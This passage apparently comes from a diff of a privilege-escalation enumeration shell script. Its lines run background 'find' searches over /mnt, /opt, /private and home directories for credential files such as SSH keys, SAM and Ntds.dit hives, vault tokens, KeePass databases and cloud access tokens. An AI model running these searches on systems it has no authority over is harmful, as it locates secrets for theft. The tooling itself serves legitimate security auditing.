-o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"ssh*config\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_LIB=`eval_bckgrd "find /lib -name \"rocketchat.service\" -o -name \"*.socket\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_MEDIA=`eval_bckgrd "find /media -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_MNT=`eval_bckgrd "find /mnt -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"sess_*\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_OPT=`eval_bckgrd "find /opt -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_PRIVATE=`eval_bckgrd "find /private -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"sess_*\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name 